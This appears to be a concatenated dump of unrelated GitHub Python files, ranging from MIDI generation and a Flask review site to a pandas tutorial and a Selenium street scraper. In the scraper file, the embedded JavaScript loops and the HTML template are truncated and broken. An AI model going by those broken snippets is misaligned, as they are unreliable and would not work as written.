\r\nax32.plot(V_aux_worst[1][0:count]/V2_0_worst, Iqp_aux_worst[1][0:count]/I2_0_worst,\r\n lw = 1.5, label='suboptimal', color='black')\r\nax32.set_title('suboptimal', fontsize = 20)\r\nax32.set_xlabel(r'$V/V_0$', fontsize = 20, labelpad = 10)\r\nax32.set_ylabel(r'$I/I_0$', fontsize = 20, labelpad = 10)\r\nax32.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\nplt.tight_layout()\r\n\r\n\r\n# ---- Fig 4 --- \r\nfig4 = plt.figure(4)\r\n\r\nax41 = fig4.add_subplot(1,1,1)\r\n\r\nax41.plot(t_best[indices_best[1:]]/timescale_best, FF_best[0], lw=1, marker='o', label='optimal', color='black')\r\nax41.plot(t_worst[indices_worst[1:]]/timescale_worst, FF_worst[0], lw=1, ls='--', marker='o', label='suboptimal',color='grey')\r\n# ax41.set_title('Form factor', fontsize = 25)\r\nax41.set_xlabel(r'$t/T$', fontsize = 25, labelpad = 10)\r\nax41.set_ylabel(r'$\\mathcal{F}$', fontsize = 25, labelpad = 10)\r\nax41.tick_params(axis='both', which='major', labelsize=20, width = 2, length=4)\r\nplt.legend(fontsize=20)\r\n\r\n\r\n# ---- Fig 5 ----- \r\nfig5 = plt.figure(5, figsize = [12, 8])\r\nax5 = fig5.add_subplot(1,1,1)\r\nax5.plot(t_best/timescale_best, concurrence_best, lw = 3, label='optimal', color='black')\r\nax5.plot(t_worst/timescale_worst, concurrence_worst, lw = 3, label='suboptimal', ls='--', color='grey')\r\nax5.set_xlabel(r'$t/T$', fontsize = 20, labelpad = 10)\r\nax5.set_ylabel(r'$C$', fontsize = 20, labelpad = 10)\r\nax5.tick_params(axis='both', which='major', labelsize=15, width = 2, length=4)\r\nax5.legend(fontsize=20)","repo_name":"carlos-hernani/QuantumMemristor","sub_path":"quantum_correlations_and_figures.py","file_name":"quantum_correlations_and_figures.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15327957778","text":"from numpy import random\nfrom music21 import midi\n\nmt = midi.MidiTrack(1)\n\ndef populate_midi_track_from_data(mt, data):\n t = 0\n tLast = 0\n for d, p, v in data:\n dt = midi.DeltaTime(mt)\n dt.time = t - tLast\n # add to track events\n mt.events.append(dt)\n\n me = midi.MidiEvent(mt)\n me.type = \"NOTE_ON\"\n me.channel = 1\n me.time = None # d\n me.pitch = p\n me.velocity = v\n mt.events.append(me)\n\n # add note off / velocity zero message\n dt = midi.DeltaTime(mt)\n dt.time = d\n # add to track events\n mt.events.append(dt)\n\n me = midi.MidiEvent(mt)\n me.type = \"NOTE_ON\"\n me.channel = 1\n me.time = None # d\n me.pitch = p\n me.velocity = 0\n mt.events.append(me)\n\n tLast = t + d # have delta to note off\n t += d # next time\n\n # add end of track\n dt = midi.DeltaTime(mt)\n dt.time = 0\n mt.events.append(dt)\n\n me = midi.MidiEvent(mt)\n me.type = \"END_OF_TRACK\"\n me.channel = 1\n me.data = '' # must set data to empty string\n mt.events.append(me)\n\n return mt\n\n# duration, pitch, velocity\ndata = [[256, 36, 100]] # one start note\ntotal_duration = 0\n\nbeats_per_measure = 16\nmeasures = 64\nnum_beats = measures * beats_per_measure\nbeat_idx = 1\n\n# note array is ordered [duration, pitch, velocity]\nfor i in range(1, num_beats):\n\n # generate one beat\n note = [256, 0, 0]\n\n e = random.random()\n last_note_was_rest = data[-1][2] < 0\n if e < 0.15 and beat_idx > 0: # no resting on down beat\n # rest\n note[0] = 256\n note[1] = 0\n note[2] = 0\n data.append(note)\n elif last_note_was_rest and e < 0.25 and beat_idx > 0:\n # sustain rest\n data[-1][0] += 256\n elif not last_note_was_rest and e < 0.50 and beat_idx > 0:\n # sustain note\n data[-1][0] += 256\n else:\n # new note\n if beat_idx % 4 == 0:\n pitch = 36\n else:\n pitch = random.randint(36, 52)\n note[0] = 256 # 256 is 16th note\n note[1] = pitch\n note[2] = random.randint(40, 100)\n last_real_pitch = note[1]\n data.append(note)\n\n # change chords\n beat_idx += 1\n if beat_idx == beats_per_measure/4:\n beat_idx = 0\n print(i, ' out of ', num_beats)\n\nprint(data)\npopulate_midi_track_from_data(mt, data)\n\nmf = midi.MidiFile()\nmf.ticksPerQuarterNote = 1024 # magic number?\nmf.tracks.append(mt)\n\nmf.open('comp1 Project/rhythm.mid', 'wb')\nmf.write()\nmf.close()\n","repo_name":"PeterMitrano/Music","sub_path":"generate_rhythm.py","file_name":"generate_rhythm.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37442184216","text":"import json\n\nclass JSONOps():\n '''\n RESTful filehandling Operations\n '''\n def __init__(self,path):\n ''' check if the file exists else create an empty json '''\n self.path = path\n try:\n with open(self.path,\"r\") as rf:\n pass\n except:\n with open(self.path,\"w+\") as wf:\n wf.write(\"{ }\")\n\n def get_from_json(self):\n with open(self.path,\"r\") as jsonfile:\n return jsonfile.read()\n\n def update_json_file(self,data):\n with open(self.path,\"w\") as jsonfile:\n print(json.dumps(data,indent=4))\n jsonfile.write(json.dumps(data))\n\n def append_json_file(self,data):\n json_dict = json.loads(self.get_from_json())\n json_dict.update(data)\n self.update_json_file(json_dict)","repo_name":"sribs/CamelApp","sub_path":"JSONOps.py","file_name":"JSONOps.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3971407242","text":"total = 0\nopcion= 0\n\nwhile opcion != 6:\n print(\"====== Panadería DuocUC ======\")\n print(\"1.- Pan Amasado\")\n print(\"2.- Pan Molde\")\n print(\"3.- Pan Baguette\")\n print(\"4.- Pan Integral\")\n print(\"5.- Total de compra\")\n print(\"6.- Salir\")\n try:\n opcion = int(input(\"Ingrese una opción:\"))\n except:\n print(\"Error en al opción ingresada\")\n\n if opcion < 1 or opcion > 6:\n print(\"Opción no válida\")\n input(\"Presione enter para continuar\")\n elif opcion == 6:\n print(\"Aplicación cerrada\")\n elif opcion == 5:\n if total < 5000:\n total *= 1.1\n else:\n print(\"Envio gratis\")\n print(\"El total de la compra es:\",int(total))\n total = 0\n input(\"Presione enter para continuar\")\n\n else:\n try:\n cantidad = int(input(\"Ingrese cantidad:\"))\n except:\n print(\"Error en la cantidad ingresada\")\n continue\n \n if opcion == 1:\n total += cantidad * 1500\n elif opcion == 2:\n total += cantidad * 1000\n elif opcion == 3:\n total += cantidad * 2000\n elif opcion == 4:\n total += cantidad * 3000\n ","repo_name":"patricioyanez/PGY1121_002","sub_path":"EA3/EjemploWhile4.py","file_name":"EjemploWhile4.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23175505661","text":"#!/usr/bin/env python\n\nimport json\nfrom auth0_client.Auth0Client import Auth0Client\nfrom auth0_client.menu.menu_helper.common import *\nfrom auth0_client.menu.menu_helper.pretty import *\n\n\ntry:\n\n client = Auth0Client(auth_config())\n results = client.get_all_rules()\n\n if type(results) == type(str()):\n results = json.loads(results)\n\n if results:\n print(pretty(results))\n else:\n print('No rules')\n\n\n\nexcept (KeyboardInterrupt, SystemExit):\n sys.exit()","repo_name":"rubelw/auth0_client","sub_path":"auth0_client/menu/datafiles/scripts/list_rules.py","file_name":"list_rules.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23573778991","text":"import sys\n\n\n\ndef split_sequence(n):\n if n%2:\n return (n-1)/2, (n-1)/2\n return n/2-1, n/2\n\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n infile = open(filename+\".in\", \"r\")\n outfile = open(filename+\".out\", \"w\")\n T = int(infile.readline())\n for case in range(T):\n N, K = [int(char) for char in infile.readline().split()]\n remaining_people = K\n coming_people = 1\n while remaining_people - coming_people >= 0:\n remaining_people -= coming_people\n coming_people *= 2\n length = float(N-K)/float(coming_people//2)\n if remaining_people > 0:\n length /= 2.0\n min_free = int(length/2)\n max_free = int(length-min_free)\n #print max_free, min_free\n outfile.write(\"Case #{}: {} {}\\n\".format(case+1, max_free, min_free))\n infile.close()\n outfile.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/905.py","file_name":"905.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70347971394","text":"import re\nimport yaml\nimport sqlite3\nimport re\nimport os\nimport subprocess\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nfrom selenium.webdriver.support import expected_conditions as EC # available since 2.26.0\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import WebDriverException, StaleElementReferenceException\nfrom contextlib import contextmanager\n\nfrom pyvirtualdisplay import Display as PYDisplay\nfrom os import popen, mkdir\nfrom time import sleep\nfrom typing import Optional,Any\nfrom textwrap import dedent\n\n\nfrom Config_Msk import DBVER,DBNAME\nfrom Util import selenium_display,selenium_driver,class_has\n\nSCRIPT='''\n\nfunction clearclass(item, cls) {\n item.classList.remove(cls);\n}\nfunction setclass(item, cls) {\n item.classList.add(cls);\n}\n\nfunction filter(predicate) {\n var nodelist = document.getElementById('data').getElementsByTagName('tr');\n var good = new Array()\n var bad = new Array()\n for (var i = 1; i < nodelist.length; i++) {\n var tr = nodelist.item(i);\n if (i % 100 == 0) {\n console.log('Processed '+i+' of '+nodelist.length)\n }\n if(predicate(tr)) {\n good.push(tr);\n }\n else {\n bad.push(tr);\n }\n }\n console.log('Collect '+good.length+' / '+bad.length)\n\n bad.forEach(function(el,index){\n el.style.display = \"none\";\n });\n good.forEach(function(el,index){\n el.style.display = \"table-row\";\n });\n\n console.log('Complete '+good.length+' / '+bad.length)\n}\n\nfunction matchtr(tr, record) {\n var tds = tr.getElementsByTagName('td');\n for(var j = 0 ; j \n if (tds[j].innerHTML.trim() == record) {\n return true;\n }\n }\n return false\n}\n\nfunction trtext(tr) {\n var res = \" \";\n var tds = tr.getElementsByTagName('td');\n for(var j = 0 ; j 0)\n return true;\n else\n return false;\n };\n}\n'''\n\ndef format_html(dbname:str=DBNAME):\n with sqlite3.connect(dbname) as con:\n sql='''\n SELECT Name,District,Houses,Link\n FROM Streets_GInfo\n ORDER BY District,Name'''\n\n with open(\"Streets_GInfo_Msk.html\",\"w\") as f:\n f.write(dedent('''\\\n \n \n \n \n \n
\n

\n Поиск видит строки таблицы как большие предложения, в которых текст\n колонок соединен символами ' ; ' (с пробелами). Поиск понимает\n регулярные выражения. Регистр значения не имеет.\n

\n

\n Примеры:\n

    \n
  • 'Верхний' - отфильтровать строки, в которых встречается строка Верхний
  • \n
  • 'Верхний.* 4Б' - отфильтровать строки, в которых встречается слово\n Верхний, потом лбюбое количество любых символов, потом пробел, потом\n 4Б
  • \n
  • 'Профсоюзная|Вишнёвая' - отфильтровать строки, в которых\n находятся слово Профсоюзная или слово Вишнёвая
  • \n
  • 'Вишнёвая.* 3|Профсоюзная' - отфильтровать строки, в которых\n находятся слова Профсоюзная или слово Вишнёвая-чтото-чтото-пробел-3
  • \n
\n

\n \n \n \n
\n \n \n \n \n \n \n \n '''))\n for i,r in enumerate(con.execute(sql)):\n name = str(r[0])\n district = str(r[1])\n houses = str(r[2])\n link = str(r[3])\n\n f.write(dedent(f'''\n \n \n \n \n \n \n '''))\n f.write(dedent('''\n
РайонНазваниеДома
{i}{district}{name}{houses}
\n \n \n '''))\n\ndef mkdb(dbname:str=DBNAME):\n with sqlite3.connect(dbname) as con:\n try:\n cur = con.cursor()\n cur.execute(\" \\\n CREATE TABLE Streets_GInfo( \\\n Name TEXT PRIMARY KEY, \\\n Link TEXT NOT NULL, \\\n District TEXT, \\\n Houses TEXT, \\\n Version INT NOT NULL, \\\n Screenshot TEXT)\")\n con.commit()\n except sqlite3.OperationalError as err:\n print(err,'(Ignoring)')\n\n\n# def addstreet(con, name:str, link:str):\n# with con:\n# try:\n# print(f'Adding street \"{name}\" ({link})')\n# con.execute('INSERT INTO Streets(Name, Link, Version) VALUES(?, ?, ?)',\n# (name, link, DBVER))\n# except sqlite3.Error as err:\n# print(\"Sqlite error\", str(err))\n\n\ndef format_md(dbname:str=DBNAME):\n with sqlite3.connect(dbname) as con:\n sql=f'''\n SELECT Name,District,Houses,Link\n FROM Streets_GInfo\n ORDER BY District,Name'''\n\n with open(\"Streets_GInfo_Msk.md\",\"w\") as f:\n f.write(f\"|№|Район|Название|Дома|\\n\")\n f.write(f\"|-|-|-|-|\\n\")\n for i,r in enumerate(con.execute(sql)):\n name = str(r[0])\n district = str(r[1])\n houses = str(r[2])\n link = str(r[3])\n\n f.write(f\"|{i}|{district}|[{name}]({link})|{houses}|\\n\")\n\n\ndef scrap(close:bool=True, dbname:str=DBNAME):\n \"\"\" Open display and samples chat messages \"\"\"\n\n ret=subprocess.call(['convert','-version'])\n assert ret==0\n\n screenshotdir=os.path.dirname(os.path.abspath(__file__)) + '/../screenshots_msk/'\n if not os.path.isdir(screenshotdir):\n os.mkdir(screenshotdir)\n\n with selenium_display(visible=True,close=close) as disp, \\\n selenium_driver(close=close) as driver:\n\n url = f\"http://ginfo.ru/ulicy/\"\n print('Navigating to', url)\n driver.get(url)\n\n print('Searching for elements')\n els=driver.find_elements(By.XPATH, f\"//div[{class_has('street_unit')}]/a\")\n street_urls=[el.get_attribute('href') for el in els]\n print(f\"Found {len(street_urls)} street links\")\n\n with sqlite3.connect(dbname) as con:\n for i,url in enumerate(street_urls):\n try:\n print('Navigating to', url)\n driver.get(url)\n except Exception as err:\n print(f'Cant navigate to {url} ({err})')\n continue\n\n try:\n elname=driver.find_elements(\n By.XPATH,\n f\"//span[{class_has('this_page')}]\")[0]\n name=elname.text\n except Exception as err:\n print(f'Cant find name ({err}), skipping')\n continue\n\n try:\n eldistr=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('opis_ulica')}]/a\")[0]\n district=re.sub('районе', 'район', eldistr.text)\n district=re.sub('поселении', 'поселение', district)\n except Exception as err:\n print(f'Cant find District ({err})')\n district=None\n\n try:\n houslist=[]\n eldoms=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('dom_list')}]/div/a\")\n for el in eldoms:\n houslist.append(el.text)\n houses=', '.join(houslist)\n except Exception as err:\n print(f'Cant find houses ({err})')\n houses=None\n\n try:\n print(f\"Capturing screenshot of {name}\")\n els=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('right_block_2')}]\")\n if len(els)!=1:\n raise ValueError('Cant find screenshot block ')\n\n screenshot_file=\"/tmp/street_screenshot.png\"\n print(f\"Saving {screenshot_file}\")\n els[0].screenshot(screenshot_file)\n small_screenshot_filename=(\"small_screenshot_%04d.png\" %(i,))\n small_screenshot_file=screenshotdir+'/'+small_screenshot_filename\n\n print(f\"Converting to {small_screenshot_file}\")\n ret=subprocess.call(['convert', '-resize', '192x192', screenshot_file, small_screenshot_file])\n if ret!=0:\n raise ValueError(f\"Error code is {ret} (!=0), skipping\")\n\n except Exception as err:\n print(f'Cant prepare a screenshot ({err}), skipping')\n small_screenshot_filename=None\n\n\n print(f\"Adding name '{name}'\\ndistrict '{district}'\\nhouses '{houses}'\")\n try:\n con.execute('''\n INSERT INTO Streets_GInfo(Name, Link, District, Houses, Screenshot, Version)\n VALUES (?, ?, ?, ?, ?, ?)''',\n (name, url, district, houses, small_screenshot_filename, DBVER))\n except sqlite3.Error as err:\n print(\"Sqlite error\", str(err), \"(ignoring)\")\n\n\n\n\n\n\n\n\ndef scrap_screenshots(dbname:str=DBNAME):\n with selenium_display(visible=True,close=True) as disp, \\\n selenium_driver(close=True) as driver:\n\n ret=subprocess.call(['convert','-version'])\n assert ret==0\n\n screenshotdir=os.path.dirname(os.path.abspath(__file__)) + '/../screenshots/'\n if not os.path.isdir(screenshotdir):\n os.mkdir(screenshotdir)\n\n with sqlite3.connect(dbname) as con:\n sql=\"SELECT Name,Link FROM Streets_GInfo WHERE Link is NOT NULL ORDER BY Name\"\n for i,r in enumerate(con.execute(sql)):\n name = str(r[0])\n url = str(r[1])\n\n try:\n print('Navigating to', url)\n driver.get(url)\n except Exception as err:\n print(f'Cant navigate to {url} ({err})')\n continue\n\n try:\n print(f\"Capturing {name}\")\n els=driver.find_elements(\n By.XPATH,\n f\"//div[{class_has('right_block_2')}]\")\n if len(els)<1:\n continue\n\n screenshot_file=\"/tmp/street_screenshot.png\"\n print(f\"Saving {screenshot_file}\")\n els[0].screenshot(screenshot_file)\n small_screenshot_filename=(\"small_screenshot_%04d.png\" %(i,))\n small_screenshot_file=screenshotdir+'/'+small_screenshot_filename\n\n print(f\"Converting to {small_screenshot_file}\")\n ret=subprocess.call(['convert', '-resize', '192x192', screenshot_file, small_screenshot_file])\n if ret!=0:\n print(f\"Error code is {ret} (!=0), skipping\")\n continue\n\n except Exception as err:\n print(f'Cant prepare a screenshot ({err}), skipping')\n continue\n\n try:\n print(f\"Updating name '{name}'\\nscreenshot '{small_screenshot_filename}'\\n\")\n con.execute('''\n UPDATE Streets_GInfo SET Screenshot = ? WHERE Name = ?''',\n (small_screenshot_filename, name))\n except sqlite3.Error as err:\n print(\"Sqlite error\", str(err), \"(ignoring)\")\n\n\n\nif __name__ == '__main__':\n scrap()\n\n","repo_name":"grwlf/streets","sub_path":"src/GInfo_Msk.py","file_name":"GInfo_Msk.py","file_ext":"py","file_size_in_byte":12197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31063814935","text":"from flask import render_template, request, redirect\nfrom app import app\nimport users\nimport stats\nimport places\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", places=stats.places_for_map())\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"login.html\")\n\n if request.method == \"POST\":\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if not users.login(username, password):\n return render_template(\"error.html\", message=\"Väärä tunnus tai salasana\")\n return redirect(\"/\")\n\n@app.route(\"/logout\")\ndef logout():\n users.logout()\n return redirect(\"/\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"GET\":\n return render_template(\"register.html\")\n\n if request.method == \"POST\":\n username = request.form[\"username\"]\n if len(username) < 1 or len(username) > 20:\n return render_template(\"error.html\", message=\"Tunnuksen tulee olla 1-20 merkkiä pitkä\")\n\n password1 = request.form[\"password1\"]\n password2 = request.form[\"password2\"]\n if password1 != password2:\n return render_template(\"error.html\", message=\"Salasanat eroavat toisistaan\")\n if password1 == \"\":\n return render_template(\"error.html\", message=\"Salasana on tyhjä\")\n\n role = request.form[\"role\"]\n if role not in (\"1\", \"2\"):\n return render_template(\"error.html\", message=\"Tuntematon käyttäjärooli\")\n\n if not users.register(username, password1, role):\n return render_template(\"error.html\", message=\"Rekisteröinti ei onnistunut\")\n\n return redirect(\"/\")\n\n@app.route(\"/search\", methods=[\"POST\"])\ndef search():\n query = request.form[\"query\"]\n if len(query) < 1 or len(query) > 20:\n return render_template(\"error.html\", message=\"Hakusanan tulee olla 1-20 merkkiä pitkä\")\n\n result = stats.find_all_by_word(query)\n if not result:\n return render_template(\"error.html\", message=\"Hakusanalla ei löytynyt tuloksia\")\n\n return render_template(\"search.html\", places=result)\n\n@app.route(\"/info/\")\ndef info(place_id):\n information = places.get_place_info(place_id)\n groups = places.get_groups(place_id)\n return render_template(\"info.html\", name=information[1], groups=groups,\n address=information[2], hours=information[4:],\n description=information[3], id=information[0])\n\n@app.route(\"/post_review/\", methods=[\"GET\", \"POST\"])\ndef post_review(place_id):\n if request.method == \"GET\":\n users.require_role(1)\n return render_template(\"post_review.html\", id=place_id)\n if request.method == \"POST\":\n users.require_role(1)\n users.check_csrf()\n\n stars = int(request.form[\"stars\"])\n if stars < 1 or stars > 5:\n return render_template(\"error.html\", message=\"Virheellinen tähtimäärä\")\n\n comment = request.form[\"comment\"]\n if len(comment) > 1000:\n return render_template(\"error.html\", message=\"Liian pitkä kommentti\")\n if comment == \"\":\n comment = \"-\"\n places.add_review(place_id, users.user_id(), stars, comment)\n return redirect(\"/reviews/\"+str(place_id))\n\n@app.route(\"/reviews/\")\ndef reviews(place_id):\n results = places.get_reviews(place_id)\n return render_template(\"reviews.html\", reviews=results, id=place_id)\n\n@app.route(\"/list\")\ndef place_list():\n ranking = stats.place_rankings()\n return render_template(\"list.html\", rankings=ranking)\n\n@app.route(\"/add_place\", methods=[\"GET\", \"POST\"])\ndef add_place():\n if request.method == \"GET\":\n users.require_role(2)\n return render_template(\"add_place.html\")\n\n if request.method == \"POST\":\n users.require_role(2)\n users.check_csrf()\n\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 40:\n return render_template(\"error.html\", message=\"Nimen tulee olla 1-40 merkkiä pitkä\")\n address = request.form[\"address\"]\n if len(address) < 1 or len(address) > 40:\n return render_template(\"error.html\", message=\"Osoite tulee olla 1-40 merkkiä pitkä\")\n lat = request.form[\"lat\"]\n lng = request.form[\"lng\"]\n if len(lat) < 1 or len(lng) < 1 or len(lat) > 40 or len(lng) > 40:\n return render_template(\"error.html\", message=\"Väärän mittaiset koordinaatit\")\n description = request.form[\"description\"]\n if len(description) > 1000:\n return render_template(\"error.html\", message=\"Kuvaus on liian pitkä\")\n\n for day in [\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\"]:\n if len(request.form[\"open_\"+day]) > 5 or len(request.form[\"close_\"+day]) > 5:\n return render_template(\"error.html\", message=\"Vääränmittainen aukioloaika\")\n\n monday_hours = request.form[\"open_mon\"] + \"-\" + request.form[\"close_mon\"]\n tuesday_hours = request.form[\"open_tue\"] + \"-\" + request.form[\"close_tue\"]\n wednesday_hours = request.form[\"open_wed\"] + \"-\" + request.form[\"close_wed\"]\n thursday_hours = request.form[\"open_thu\"] + \"-\" + request.form[\"close_thu\"]\n friday_hours = request.form[\"open_fri\"] + \"-\" + request.form[\"close_fri\"]\n saturday_hours = request.form[\"open_sat\"] + \"-\" + request.form[\"close_sat\"]\n sunday_hours = request.form[\"open_sun\"] + \"-\" + request.form[\"close_sun\"]\n\n place_id = places.add_place(name, address, lat, lng, description,\n monday_hours, tuesday_hours,\n wednesday_hours, thursday_hours, friday_hours,\n saturday_hours, sunday_hours)\n\n return redirect(\"/info/\" + str(place_id))\n\n@app.route(\"/add_group\", methods=[\"GET\", \"POST\"])\ndef add_group():\n if request.method == \"GET\":\n users.require_role(2)\n return render_template(\"add_group.html\")\n if request.method == \"POST\":\n users.require_role(2)\n users.check_csrf()\n group_name = request.form[\"groupname\"]\n if len(group_name) < 1 or len(group_name) > 20:\n return render_template(\"error.html\", message=\"Nimen pituus tulee olla 1-20 merkkiä\")\n if not places.create_groupname(group_name):\n return render_template(\"error.html\", message=\"Samanniminen ryhmä on jo olemassa\")\n return redirect(\"/\")\n\n@app.route(\"/update\", methods=[\"GET\", \"POST\"])\ndef update():\n if request.method == \"GET\":\n users.require_role(2)\n return render_template(\"update.html\", content=\"\", places=stats.place_list())\n if request.method == \"POST\":\n users.require_role(2)\n users.check_csrf()\n if \"place_id\" in request.form:\n content = places.get_place_info(request.form[\"place_id\"])\n groups = places.get_groupnames()\n return render_template(\"update.html\", content=content, groups=groups)\n\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 40:\n return render_template(\"error.html\", message=\"Nimen tulee olla 1-40 merkkiä pitkä\")\n address = request.form[\"address\"]\n if len(address) < 1 or len(address) > 40:\n return render_template(\"error.html\", message=\"Osoite tulee olla 1-40 merkkiä pitkä\")\n description = request.form[\"description\"]\n if len(description) > 1000:\n return render_template(\"error.html\", message=\"Kuvaus on liian pitkä\")\n\n for day in [\"mon\", \"tue\", \"wed\", \"thu\", \"fri\", \"sat\", \"sun\"]:\n if len(request.form[\"open_\"+day]) > 5 or len(request.form[\"close_\"+day]) > 5:\n return render_template(\"error.html\", message=\"Vääränmittainen aukioloaika\")\n\n monday_hours = request.form[\"open_mon\"] + \"-\" + request.form[\"close_mon\"]\n tuesday_hours = request.form[\"open_tue\"] + \"-\" + request.form[\"close_tue\"]\n wednesday_hours = request.form[\"open_wed\"] + \"-\" + request.form[\"close_wed\"]\n thursday_hours = request.form[\"open_thu\"] + \"-\" + request.form[\"close_thu\"]\n friday_hours = request.form[\"open_fri\"] + \"-\" + request.form[\"close_fri\"]\n saturday_hours = request.form[\"open_sat\"] + \"-\" + request.form[\"close_sat\"]\n sunday_hours = request.form[\"open_sun\"] + \"-\" + request.form[\"close_sun\"]\n place_id = request.form[\"id\"]\n places.update_place(place_id, name, address, description, monday_hours,\n tuesday_hours, wednesday_hours, thursday_hours, friday_hours,\n saturday_hours, sunday_hours)\n if \"group\" in request.form:\n for group_id in request.form[\"group\"]:\n places.add_place_to_group(place_id, int(group_id))\n return redirect(\"/info/\" + str(place_id))\n\n@app.route(\"/delete_place/\", methods=[\"POST\"])\ndef delete_place(place_id):\n users.require_role(2)\n users.check_csrf()\n places.delete_place(place_id)\n return redirect(\"/\")\n\n@app.route(\"/delete_review/\", methods=[\"POST\"])\ndef delete_review(review_id):\n users.require_role(2)\n users.check_csrf()\n places.delete_review(review_id)\n place_id = request.form[\"place_id\"]\n return redirect(\"/reviews/\" + str(place_id))\n","repo_name":"nikomakir/tsoha-harjoitustyo","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29889151171","text":"'''\nauthor: Adam Forestier\ndates: March 22, 2023\nnotes:\n - apply() apply any custom python function of our own to every row in a series. these functions should return 1 value\n'''\nimport numpy as np \nimport pandas as pd\n\ndf = pd.read_csv('tips.csv')\nreset_df = df\n\n# apply() for single argument\ndef price_class(price):\n p_class = '$$'\n if price < 10:\n p_class = '$'\n elif price > 20:\n p_class = '$$$'\n return p_class\n\ndf['price_class'] = df['total_bill'].apply(price_class) # Create a new column in the dataframe using the apply class\nlast_four_cc = df['CC Number'].apply(lambda num: str(num)[-4:]) # This will create a Pandas series of the last 4 digits of credit card numbers. The column name is the argument being passed into the lambda\n\n# apply() for multiple arguments\ndef quality_tipper(total_bill, tip):\n tip_percentage = 100 * (tip / total_bill)\n tip_quality = 'stingy'\n if tip_percentage > 20:\n tip_quality = 'generous'\n return tip_quality\n\ndf['tip_quality'] = df[['total_bill', 'tip']].apply(lambda df: quality_tipper(df['total_bill'], df['tip']), axis=1) # apply method on multiple columns in a pandas dataframe\n\n# Vectorize - This is EASIER to type AND FASTER! Really no reason not to use this approach\ndef inflation(total_bill):\n '''\n i totally just made this up for an example\n '''\n return round(total_bill + (total_bill * .173), 2)\n\ndf['first_four_cc'] = np.vectorize(lambda x: str(x)[:4])(df['CC Number']) # Single column with lambda\ndf['Inflation Price'] = np.vectorize(inflation)(df['total_bill']) # Single column with function\ndf['tip_quality'] = np.vectorize(quality_tipper)(df['total_bill'], df['tip']) # Another way to apply method on multiple columns. \n\n# Describing\ndf = reset_df\ndf.describe() # Statistical information\n\n# Sorting\ndf.sort_values('tip') # Ascending\ndf.sort_values('tip', ascending=False) # deescending\ndf.sort_values(['tip', 'total_bill']) # Multiple columns\n\n# Searching\ndf['tip'].max() # Largest\ndf['tip'].min() # smallest\ndf['total_bill'].idxmax() # Location of largest value\ndf['price_per_person'].idxmin() # Location of lowest value\nbiggest_tip = df.iloc[df['tip'].idxmax()] # get the largest tip by location\n\n# Correlations\ndf.corr() # Shows how correlated columns are with each other. Max value is 1\n\n# counting\ndf['sex'].value_counts() # Count male and female\ndf['day'].unique() # Show what unique values exist in column\ndf['day'].nunique() # Show number unique values hat exist in column\n\n# Replace\ndf['sex'] = df['sex'].replace('Female', 'f') # Replace single value in column\ndf['time'] = df['time'].replace(['Breakfast', 'Lunch', 'Dinner'], ['B', 'L', 'D']) # Replace multiple values in column Replace = Better for single item\nmy_map = {'Male': 'm'}\ndf['sex'] = df['sex'].map(my_map) # Replace using mapping for single item. Map = bettter for lots of items\ndf['sex'] = df['sex'].map(my_map) # Replace using mapping for multiple items. Map = bettter for lots of items\nmy_map = {\n '$': 'cheap',\n '$$': 'moderate',\n '$$$': 'expensive'\n}\ndf['price_class'] = df['price_class'].map(my_map)\n# print(df.head())\n\n# Duplicates\ndf.duplicated() # Show rows that are duplicates\ndf.drop_duplicates() # Remove duplicates\n\n# Between\ndf = reset_df\ndf['total_bill'].between(10, 20, inclusive=True) # Show boolean for if the total bill row is between 10 - 20\nspecific_df = df[df['total_bill'].between(10, 20, inclusive=True)] # create filtered dataframe with only bills between 10-20 \n\n# n largest and n smallest\nlargest_spender_df = df.nlargest(10, 'total_bill') # df with 10 largest spenders\ndf.nsmallest(5, 'tip') # show 5 smallest tips\n\n# Sampling\ndf.sample(5) # 5 random rows\ndf.sample(frac=.1) # 10% of random rows","repo_name":"atfb10/Py-DataScience-MachineLearning-Course","sub_path":"Course/Pandas/lessons/method_calls.py","file_name":"method_calls.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34132811787","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('task.views',\n\n url( r'^tasks$', 'show_tasks' ),\n url( r'^dashboard$', 'show_dashboard' ),\n url( r'^task/$', \t\t\t\t 'task' ),\n url( 